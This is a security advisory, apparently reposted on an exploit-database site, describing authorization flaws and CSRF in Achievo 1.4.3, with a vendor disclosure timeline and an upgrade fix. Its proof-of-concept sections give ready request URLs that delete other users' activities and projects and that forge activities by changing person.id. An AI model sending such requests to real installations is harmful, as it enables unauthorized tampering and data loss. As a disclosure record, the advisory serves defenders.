[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Achievo v1.4.3 Multiple Authorization Flaws / CSRF Vulnerability

Author
Cybsec Labs
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-14257
Category
web applications
Date add
29-09-2010
Platform
php
================================================================
Achievo v1.4.3 Multiple Authorization Flaws / CSRF Vulnerability
================================================================


Vulnerability Description:
 

It is possible to create and delete arbitrary activities to and from arbitrary users by modifying IDs in
client requests.
 
Proof of Concept:
 
1) To add activities as another user, just change value of the parameter “person.id” in the POST
request to “/dispatch.php” to any other valid person ID.
 
 
2) To delete activities from any user:
 
 
http://server/dispatch.php?atknodetype=timereg.hours&atkaction=delete&atkselector=hoursbase.id='XXXX' (where „XXXX. is the actual ID of the activity to be deleted)
 
Solution: Upgrade to version 1.4.5
 
Vendor Response:
 
2010-Aug-04: Vendor is contacted
 
2010-Aug-05: Vulnerabilities details are sent to vendor
 
2010-Aug-25: Vendor informs status

2010-Sept-27: Vendor and researcher agree publication date
 
2010-Sept-28: Vulnerability public disclosure / Patch is released

As application does not properly validate the “confirm” parameter in URL, a logged-in achievo user
may be tricked to access an URL leading to deletion of tasks or projects without user.s confirmation
  
 
Proof of Concept:
 
  
 
1) To delete a project:
 
 
http://server/dispatch.php?atknodetype=project.project&atkselector=project.id='XXXX'&atkaction=delete&atklevel=1&atkprevlevel=0&confirm=Yes
 
(where XXXX is the project ID number)
 
  
 
2) To delete an activity:
 
 
http://server/dispatch.php?atknodetype=timereg.hours&atkaction=delete&atkselector=hoursbase.id='XXXX'&confirm=Yes
 
(where „XXXX. is the actual ID of the activity to be deleted)
 
Note: Even though a confirmation message is displayed to the user, at that point the activity has
already been deleted.
 
  
Solution: Upgrade to version 1.4.5
 
Vendor Response:
 
2010-Aug-04: Vendor is contacted
 
2010-Aug-05: Vulnerabilities details are sent to vendor
 
2010-Aug-25: Vendor informs status
 
2010-Sept-27: Vendor and researcher agree publication date
 
2010-Sept-28: Vulnerability public disclosure / Patch is released 




#  0day.today [2024-12-25]  #